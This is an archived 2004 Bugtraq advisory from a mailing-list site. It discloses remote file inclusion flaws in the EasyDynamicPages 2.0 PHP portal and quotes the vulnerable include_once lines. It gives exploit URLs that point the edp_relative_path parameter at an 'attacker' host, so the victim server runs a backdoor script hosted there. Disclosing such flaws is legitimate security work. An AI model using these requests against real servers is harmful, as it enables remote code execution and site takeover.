lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 2 Jan 2004 15:18:21 -0000
From: Vietnamese Security Group <security@...urity.com.vn>
To: bugtraq@...urityfocus.com
Subject: include() vuln in EasyDynamicPages v.2.0




Producr:EasyDynamicPages v.2.0: Advanced Portal Management System 
Vendors:http://software.stoitsov.com 
Bug :include() 
Risk:Cao 
Author:tsbeginnervn(c) 
Web : www.security.com.vn

------------------------------------- 
Introduction : 
system, personal or business site or what you need. 

The goal is to have an automated web site not only to distribute news and items with automated system but also easily to create and edit dynamic web pages (DynamicPages) without knowledge of html, php or whether you need to develop websites. 

Each user can submit news, comments, discuss articles and more. Registered users and administrators can additionally create and modify DynamicPages. 

Plugins included with the install are BookMarks manager, E-Publish, E-card and E-gallery systems and Yahoo-like E-Classifier system. 

Features: design/content separation, web admin, user-customizable theme management, SiteConfig manager, PageEdit manager, Search engine, Left-Right blocks system, editor to add news and for content management, modular DynamicalPages structure, system self install and more. 

Written in PHP, works on windows, unix, linux and requires PHP, Apache and MySQL. 


Vuln in files: 
/admin/config.php va /dynamicpages/fast/config_page.php 
================== 

The Code in File /admin/config.php : 

++++++++++++++++++++++++ 
include_once $edp_relative_path."admin/serverdata.php"; 
++++++++++++++++++++++++ 


Exploit: 
http://victim/admin/config.php/edp_relative_path=http://attacker/ 
Voi host cua attacker: 
http://attacker/admin/serverdata.php 

The code in File /dynamicpages/fast/config_page.php : 

++++++++++++++++++++++++ 
$ResultHtml=""; 
if ($do=="add_page") { 
switch($du) { 
case "site": include_once $edp_relative_path."admin/site_settings.php"; break; 
case "dpage": include_once $edp_relative_path."admin/dpage_settings.php"; break; 
++++++++++++++++++++++++ 

Exploit: 
http://victim/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://attacker/ 

If a attacker have Script backdoor in URL :   
http://attacker/admin/site_settings.php 

Then acttacker exploit : 

http://victim/dynamicpages/fast/config_page.php?do=add_page&du=dpage&edp_relative_path=http://attacker/ 


====================================================================

tsbeginnervn - BugSearch
www.security.com.vn

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ